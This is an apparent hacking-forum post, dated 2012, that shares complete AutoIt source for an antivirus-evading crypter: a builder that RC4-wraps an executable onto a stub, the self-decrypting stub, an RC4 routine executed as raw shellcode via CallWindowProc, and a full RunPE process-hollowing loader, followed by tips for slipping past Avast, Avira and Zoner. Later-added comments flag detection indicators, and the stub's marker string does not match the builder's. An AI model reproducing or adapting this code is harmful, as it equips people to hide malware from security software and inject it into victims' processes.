
ES-Entendendo-Crypter-AU3-E-saltando-avs


Mensaje  Queda de Faraó Miér Mar 14, 2012 3:30 am

Buenos amigos, otra vez voy a publicar aquí una fuente de Crypter AU3 en equipo y la técnica de cómo saltar los AVs
[PHP]#NoTrayIcon
; Builder ("crypter") GUI. The user picks an .exe, and Cs() writes a new file
; made of stub.exe + a marker string + the RC4-transformed target (see Cs below).
; Defender note: that fixed layout (stub, then "Wy4530", then the payload as a
; trailing overlay keyed with a literal string) is a stable static indicator
; for files produced by this tool.
#include <ButtonConstants.au3>
#include <EditConstants.au3>
#include <GUIConstantsEx.au3>
#include <StaticConstants.au3>
#include <WindowsConstants.au3>
; _RC4() comes from this include; its implementation is posted further down.
#include <rc4.au3>
#Region ### START Koda GUI section ### Form=
; Event mode: button clicks dispatch to the handlers registered below.
Opt("GuiOnEventMode",1)
$a = GUICreate("", 610, 219, 192, 124)
; Icon path is specific to the author's machine.
GUISetIcon("C:\Users\MineiirO\Desktop\A.D.I Icones\perso7.ico", -1)
GUISetBkColor(0x000000)
$Open = GUICtrlCreateButton("Open", 488, 64, 105, 41)
$Cryptar = GUICtrlCreateButton("Cryptar", 488, 152, 113, 41)
; Holds the path of the file to pack; filled by Open(), read by Cs().
$Arquivo = GUICtrlCreateInput("Arquivo", 8, 72, 473, 21)
$Label1 = GUICtrlCreateLabel(" IsNoT Crypter By MineiirO ", 72, 16, 316, 23)
GUICtrlSetFont(-1, 12, 800, 2, "Swis721 BT")
GUICtrlSetColor(-1, 0xFF0000)
; Window close -> sr() -> Exit.
GUISetOnEvent($Gui_Event_Close, "sr")
GUISetState(@SW_SHOW)
#EndRegion ### END Koda GUI section ###
; "Open" button -> Open(); "Cryptar" button -> Cs().
GUICtrlSetOnEvent($Open, "Open")
GUICtrlSetOnEvent($Cryptar, "Cs")
Func Open()
; Let the user pick an .exe via a file dialog and place its path in the $Arquivo input box.
GUICtrlSetData($Arquivo, FileOpenDialog("Selecione o arquivo para encriptar", @DesktopDir, "Executáveis(*.exe)"))
EndFunc

Func Cs()

; Build handler: writes stub.exe + "Wy4530" marker + _RC4(target, "Key") to a
; user-chosen output path. Returns early when no input path has been entered.
if GuiCtrlRead($Arquivo) = "" then return
; 16 = binary read mode. stub.exe must sit next to the builder script.
$stub = FileOpen(@ScriptDir & "\stub.exe" , 16)
$arquivo2 = FileOpen(GuiCtrlRead($Arquivo), 16)

$st = FileRead($stub)
$ar = FileRead($arquivo2)

; The key is a fixed literal, so this is obfuscation rather than confidentiality:
; the same literal has to be present in the stub, and an analyst holding the
; output file can recover the original payload statically.
$ar = _RC4($ar, "Key")
; 18 = overwrite + binary; ".exe" is appended to whatever name the dialog returns.
$salvar = FileOpen(FileSaveDialog("Salvar Como...", @DesktopDir, "Executáveis(*.exe)") & ".exe", 18)

; Output layout: stub bytes, marker, transformed payload (as a trailing overlay).
FileWrite($salvar, $st)
FileWrite($salvar, StringToBinary("Wy4530"))
FileWrite($salvar, $ar)

FileClose($stub)
; NOTE(review): $Arquivo is the input-control ID, not the $arquivo2 file handle,
; so the handle opened on the selected file is never closed here.
FileClose($Arquivo)
FileClose($Salvar)
MsgBox(64, "Encriptado By MineiirO ! A.D.I FÊNIX! ", "")
EndFunc
Func sr()
; Close-button handler: terminates the builder.
Exit
EndFunc

; Idle loop; all work happens in the event handlers above.
While 1
Sleep(1)
WEnd[/PHP]
Stub
[PHP] #NoTrayIcon
; Stub (loader). At run time it reads its own on-disk image, takes everything
; after the "Separador" marker, passes it through _RC4 with the literal "Key"
; and hands the result to _RunPE.
; Defender note: a process opening @ScriptFullPath (its own executable) and then
; spawning a suspended child of the same binary is the behaviour to watch for.
#Include <rc4.au3>
#include <RunPe.au3>

; 0 = read mode; the file being read is the running executable itself.
$file = FileOpen(@ScriptFullPath, 0)
$Data = FileRead($file)
; Everything after the first "Separador" occurrence is treated as the payload.
$Data = StringMid($Data, StringInstr($Data, "Separador") + StringLen ("Separador"))
; Same fixed key literal as the builder.
$Data = _RC4($Data, "Key")
_RunPE($Data)[/PHP]
RC4
[PHP] Func _RC4($DATA, $key)
; Stream-cipher transform implemented as a raw x86 machine-code blob ($OPCODE):
; the bytes are copied into a DllStruct and executed through user32!CallWindowProc,
; which passes (data buffer, data length, key, 0) to them; the buffer is modified
; in place and its contents returned. The same call is used for both directions,
; consistent with a symmetric cipher. The opcode bytes themselves are not
; verifiable from here; the RC4 claim rests on the function name and its callers.
; Defender note: running a byte array via CallWindowProc is a well-known
; shellcode-launch pattern that memory-scanning and API-sequence detections key on.
; $DATA: bytes to transform. $key: key string. Returns the transformed bytes.
Local $OPCODE = "0xC81001006A006A005356578B551031C989C84989D7F2AE484829C88945F085C00F84DC000000B90001000088C82C0188840DEFFEFFFFE2F38365F4008365FC00817DFC000100007D478B45FC31D2F775F0920345100FB6008B4DFC0FB68C0DF0FEFFFF01C80345F425FF0000008945F48B75FC8A8435F0FEFFFF8B7DF486843DF0FEFFFF888435F0FEFFFFFF45FCEBB08D9DF0FEFFFF31FF89FA39550C76638B85ECFEFFFF4025FF0000008985ECFEFFFF89D80385ECFEFFFF0FB6000385E8FEFFFF25FF0000008985E8FEFFFF89DE03B5ECFEFFFF8A0689DF03BDE8FEFFFF860788060FB60E0FB60701C181E1FF0000008A840DF0FEFFFF8B750801D6300642EB985F5E5BC9C21000"
; Buffer holding the code bytes.
Local $CODEBUFFER = DllStructCreate("byte[" & BinaryLen($OPCODE) & "]")
DllStructSetData($CODEBUFFER, 1, $OPCODE)
; Buffer holding the data; transformed in place by the call below.
Local $BUFFER = DllStructCreate("byte[" & BinaryLen($DATA) & "]")
DllStructSetData($BUFFER, 1, $DATA)
DllCall("user32.dll", "none", "CallWindowProc", "ptr", DllStructGetPtr($CODEBUFFER), "ptr", DllStructGetPtr($BUFFER), "int", BinaryLen($DATA), "str", $key, "int", 0)
Local $RET = DllStructGetData($BUFFER, 1)
; Release both structs before returning.
$BUFFER = 0
$CODEBUFFER = 0
Return $RET
EndFunc[/PHP]
RunPE
[PHP]Func _RunPE($Lgfaklwgfa2BBINARYIMAGE)
; Process hollowing ("RunPE"). Starts a suspended copy of the running AutoIt
; binary (@AutoItExe), unmaps the host image at the payload's preferred ImageBase,
; writes the PE given in $Lgfaklwgfa2BBINARYIMAGE there (headers, then each
; section's raw data), points the main thread's EAX at the payload entry point
; and resumes the thread. Only PE32 images (optional-header Magic 0x10B) pass.
; Returns 0 with @error 3, 4 or 5 when the "MZ", "PE\0\0" or Magic checks fail
; (the suspended child is terminated first); on the success path there is no
; explicit Return.
; Defender note: the chain CreateProcessW(CREATE_SUSPENDED) -> GetThreadContext
; -> NtUnmapViewOfSection -> VirtualAllocEx(PAGE_EXECUTE_READWRITE) ->
; WriteProcessMemory -> SetThreadContext -> ResumeThread, issued by an AutoIt
; host, is the canonical hollowing sequence that behavioural sensors flag.
; The "Lgfaklwgfa2" prefix on every local looks like an identifier-renaming pass.
; Copy the image into a local struct so the PE headers can be overlaid on it.
Local $Lgfaklwgfa2BBINARY = Binary($Lgfaklwgfa2BBINARYIMAGE)
Local $Lgfaklwgfa2TBINARY = DllStructCreate("byte[" & BinaryLen($Lgfaklwgfa2BBINARY) & "]")
DllStructSetData($Lgfaklwgfa2TBINARY, 1, $Lgfaklwgfa2BBINARY)
; Cursor into the local copy; advanced header by header below.
Local $Lgfaklwgfa2PPOINTER = DllStructGetPtr($Lgfaklwgfa2TBINARY)
Local $Lgfaklwgfa2TSTARTUPINFO = DllStructCreate("dword cbSize;" & "ptr Reserved;" & "ptr Desktop;" & "ptr Title;" & "dword X;" & "dword Y;" & "dword XSize;" & "dword YSize;" & "dword XCountChars;" & "dword YCountChars;" & "dword FillAttribute;" & "dword Flags;" & "ushort ShowWindow;" & "ushort Reserved2;" & "ptr Reserved2;" & "ptr hStdInput;" & "ptr hStdOutput;" & "ptr hStdError")
Local $Lgfaklwgfa2TPROCESS_INFORMATION = DllStructCreate("ptr Process;" & "ptr Thread;" & "dword ProcessId;" & "dword ThreadId")
; CreateProcessW on the AutoIt executable itself; creation flags 4 = CREATE_SUSPENDED.
Local $Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "CreateProcessW", "wstr", @AutoItExe, "ptr", 0, "ptr", 0, "ptr", 0, "int", 0, "dword", 4, "ptr", 0, "ptr", 0, "ptr", DllStructGetPtr($Lgfaklwgfa2TSTARTUPINFO), "ptr", DllStructGetPtr($Lgfaklwgfa2TPROCESS_INFORMATION))
Local $Lgfaklwgfa2HPROCESS = DllStructGetData($Lgfaklwgfa2TPROCESS_INFORMATION, "Process")
Local $Lgfaklwgfa2HTHREAD = DllStructGetData($Lgfaklwgfa2TPROCESS_INFORMATION, "Thread")
; x86 CONTEXT layout; ContextFlags 65538 = 0x10002 = CONTEXT_i386 | CONTEXT_INTEGER.
Local $Lgfaklwgfa2TCONTEXT = DllStructCreate("dword ContextFlags;" & "dword Dr0;" & "dword Dr1;" & "dword Dr2;" & "dword Dr3;" & "dword Dr6;" & "dword Dr7;" & "dword ControlWord;" & "dword StatusWord;" & "dword TagWord;" & "dword ErrorOffset;" & "dword ErrorSelector;" & "dword DataOffset;" & "dword DataSelector;" & "byte RegisterArea[80];" & "dword Cr0NpxState;" & "dword SegGs;" & "dword SegFs;" & "dword SegEs;" & "dword SegDs;" & "dword Edi;" & "dword Esi;" & "dword Ebx;" & "dword Edx;" & "dword Ecx;" & "dword Eax;" & "dword Ebp;" & "dword Eip;" & "dword SegCs;" & "dword EFlags;" & "dword Esp;" & "dword SegS")
DllStructSetData($Lgfaklwgfa2TCONTEXT, "ContextFlags", 65538)
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "GetThreadContext", "ptr", $Lgfaklwgfa2HTHREAD, "ptr", DllStructGetPtr($Lgfaklwgfa2TCONTEXT))
; IMAGE_DOS_HEADER overlaid on the local copy; e_lfanew (AddressOfNewExeHeader) locates the NT headers.
Local $Lgfaklwgfa2TIMAGE_DOS_HEADER = DllStructCreate("char Magic[2];" & "ushort BytesOnLastPage;" & "ushort Pages;" & "ushort Relocations;" & "ushort SizeofHeader;" & "ushort MinimumExtra;" & "ushort MaximumExtra;" & "ushort SS;" & "ushort SP;" & "ushort Checksum;" & "ushort IP;" & "ushort CS;" & "ushort Relocation;" & "ushort Overlay;" & "char Reserved[8];" & "ushort OEMIdentifier;" & "ushort OEMInformation;" & "char Reserved2[20];" & "dword AddressOfNewExeHeader", $Lgfaklwgfa2PPOINTER)
$Lgfaklwgfa2PPOINTER += DllStructGetData($Lgfaklwgfa2TIMAGE_DOS_HEADER, "AddressOfNewExeHeader")
Local $Lgfaklwgfa2SMAGIC = DllStructGetData($Lgfaklwgfa2TIMAGE_DOS_HEADER, "Magic")
; Not a DOS/PE file: kill the suspended child and report @error 3.
If Not ($Lgfaklwgfa2SMAGIC == "MZ") Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0)
Return SetError(3, 0, 0)
EndIf
; NT signature: 17744 = 0x4550 = "PE\0\0". @error 4 otherwise.
Local $Lgfaklwgfa2TIMAGE_NT_SIGNATURE = DllStructCreate("dword Signature", $Lgfaklwgfa2PPOINTER)
$Lgfaklwgfa2PPOINTER += 4
If DllStructGetData($Lgfaklwgfa2TIMAGE_NT_SIGNATURE, "Signature") <> 17744 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0)
Return SetError(4, 0, 0)
EndIf
; IMAGE_FILE_HEADER (20 bytes); only NumberOfSections is used.
Local $Lgfaklwgfa2TIMAGE_FILE_HEADER = DllStructCreate("ushort Machine;" & "ushort NumberOfSections;" & "dword TimeDateStamp;" & "dword PointerToSymbolTable;" & "dword NumberOfSymbols;" & "ushort SizeOfOptionalHeader;" & "ushort Characteristics", $Lgfaklwgfa2PPOINTER)
Local $Lgfaklwgfa2INUMBEROFSECTIONS = DllStructGetData($Lgfaklwgfa2TIMAGE_FILE_HEADER, "NumberOfSections")
$Lgfaklwgfa2PPOINTER += 20
; IMAGE_OPTIONAL_HEADER32 up to NumberOfRvaAndSizes (96 bytes); data directories follow.
Local $Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER = DllStructCreate("ushort Magic;" & "ubyte MajorLinkerVersion;" & "ubyte MinorLinkerVersion;" & "dword SizeOfCode;" & "dword SizeOfInitializedData;" & "dword SizeOfUninitializedData;" & "dword AddressOfEntryPoint;" & "dword BaseOfCode;" & "dword BaseOfData;" & "dword ImageBase;" & "dword SectionAlignment;" & "dword FileAlignment;" & "ushort MajorOperatingSystemVersion;" & "ushort MinorOperatingSystemVersion;" & "ushort MajorImageVersion;" & "ushort MinorImageVersion;" & "ushort MajorSubsystemVersion;" & "ushort MinorSubsystemVersion;" & "dword Win32VersionValue;" & "dword SizeOfImage;" & "dword SizeOfHeaders;" & "dword CheckSum;" & "ushort Subsystem;" & "ushort DllCharacteristics;" & "dword SizeOfStackReserve;" & "dword SizeOfStackCommit;" & "dword SizeOfHeapReserve;" & "dword SizeOfHeapCommit;" & "dword LoaderFlags;" & "dword NumberOfRvaAndSizes", $Lgfaklwgfa2PPOINTER)
$Lgfaklwgfa2PPOINTER += 96
; Magic 267 = 0x10B = PE32; anything else (e.g. PE32+) is rejected with @error 5.
Local $Lgfaklwgfa2IMAGIC = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "Magic")
If $Lgfaklwgfa2IMAGIC <> 267 Then
DllCall("kernel32.dll", "int", "TerminateProcess", "ptr", $Lgfaklwgfa2HPROCESS, "dword", 0)
Return SetError(5, 0, 0)
EndIf
Local $Lgfaklwgfa2IENTRYPOINTNEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "AddressOfEntryPoint")
; Skip the 16 data directories (16 * 8 bytes) to reach the section table.
$Lgfaklwgfa2PPOINTER += 128
Local $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "ImageBase")
Local $Lgfaklwgfa2IOPTIONALHEADERSIZEOFIMAGENEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "SizeOfImage")
; Unmap whatever the host has at the payload's preferred ImageBase, then allocate
; SizeOfImage bytes there: 12288 = 0x3000 = MEM_COMMIT | MEM_RESERVE, 64 = 0x40 = PAGE_EXECUTE_READWRITE.
$Lgfaklwgfa2ACALL = DllCall("ntdll.dll", "int", "NtUnmapViewOfSection", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW)
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "ptr", "VirtualAllocEx", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2POPTIONALHEADERIMAGEBASENEW, "dword", $Lgfaklwgfa2IOPTIONALHEADERSIZEOFIMAGENEW, "dword", 12288, "dword", 64)
; Base address returned by VirtualAllocEx (element 0 of the DllCall result).
Local $Lgfaklwgfa2PREMOTECODE = $Lgfaklwgfa2ACALL[0]
; Write the PE headers (SizeOfHeaders bytes from the start of the image) into the child.
Local $Lgfaklwgfa2PHEADERS_NEW = DllStructGetPtr($Lgfaklwgfa2TIMAGE_DOS_HEADER)
Local $Lgfaklwgfa2IOPTIONALHEADERSIZEOFHEADERSNEW = DllStructGetData($Lgfaklwgfa2TIMAGE_OPTIONAL_HEADER, "SizeOfHeaders")
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2PREMOTECODE, "ptr", $Lgfaklwgfa2PHEADERS_NEW, "dword", $Lgfaklwgfa2IOPTIONALHEADERSIZEOFHEADERSNEW, "dword*", 0)
Local $Lgfaklwgfa2TIMAGE_SECTION_HEADER
Local $Lgfaklwgfa2ISIZEOFRAWDATA, $Lgfaklwgfa2PPOINTERTORAWDATA
Local $Lgfaklwgfa2IVIRTUALADDRESS
; One IMAGE_SECTION_HEADER (40 bytes) per section: copy SizeOfRawData bytes from
; the file offset PointerToRawData to base + VirtualAddress in the child.
; Sections with no raw data (e.g. .bss-style) are skipped.
For $Lgfaklwgfa2I = 1 To $Lgfaklwgfa2INUMBEROFSECTIONS
$Lgfaklwgfa2TIMAGE_SECTION_HEADER = DllStructCreate("char Name[8];" & "dword UnionOfVirtualSizeAndPhysicalAddress;" & "dword VirtualAddress;" & "dword SizeOfRawData;" & "dword PointerToRawData;" & "dword PointerToRelocations;" & "dword PointerToLinenumbers;" & "ushort NumberOfRelocations;" & "ushort NumberOfLinenumbers;" & "dword Characteristics", $Lgfaklwgfa2PPOINTER)
$Lgfaklwgfa2ISIZEOFRAWDATA = DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "SizeOfRawData")
$Lgfaklwgfa2PPOINTERTORAWDATA = DllStructGetPtr($Lgfaklwgfa2TIMAGE_DOS_HEADER) + DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "PointerToRawData")
$Lgfaklwgfa2IVIRTUALADDRESS = DllStructGetData($Lgfaklwgfa2TIMAGE_SECTION_HEADER, "VirtualAddress")
If $Lgfaklwgfa2ISIZEOFRAWDATA Then
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "WriteProcessMemory", "ptr", $Lgfaklwgfa2HPROCESS, "ptr", $Lgfaklwgfa2PREMOTECODE + $Lgfaklwgfa2IVIRTUALADDRESS, "ptr", $Lgfaklwgfa2PPOINTERTORAWDATA, "dword", $Lgfaklwgfa2ISIZEOFRAWDATA, "dword*", 0)
EndIf
$Lgfaklwgfa2PPOINTER += 40
Next
; In a freshly created, still-suspended x86 process EAX carries the entry-point
; address the loader will jump to; redirect it to the written image's entry point.
DllStructSetData($Lgfaklwgfa2TCONTEXT, "Eax", $Lgfaklwgfa2PREMOTECODE + $Lgfaklwgfa2IENTRYPOINTNEW)
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "SetThreadContext", "ptr", $Lgfaklwgfa2HTHREAD, "ptr", DllStructGetPtr($Lgfaklwgfa2TCONTEXT))
; Resume the main thread; the child now runs the payload instead of the host image.
$Lgfaklwgfa2ACALL = DllCall("kernel32.dll", "int", "ResumeThread", "ptr", $Lgfaklwgfa2HTHREAD)
EndFunc[/PHP]
Los buenos amigos son algunas maneras de final ir simple de la AVS:
Zoner--

; Runs upx.exe with "-d" (decompress) against stub.exe in the script folder,
; window hidden, and waits for it to finish.
ShellExecuteWait(@Scriptdir & "\upx.exe", '-d stub.exe', @scripdir &'\','open',@SW_HIDE)



Para eliminar avast y avira asiento con la cabeza RC4 cifrar y RunPE
Que quede claro que este post es de mi total autoría.
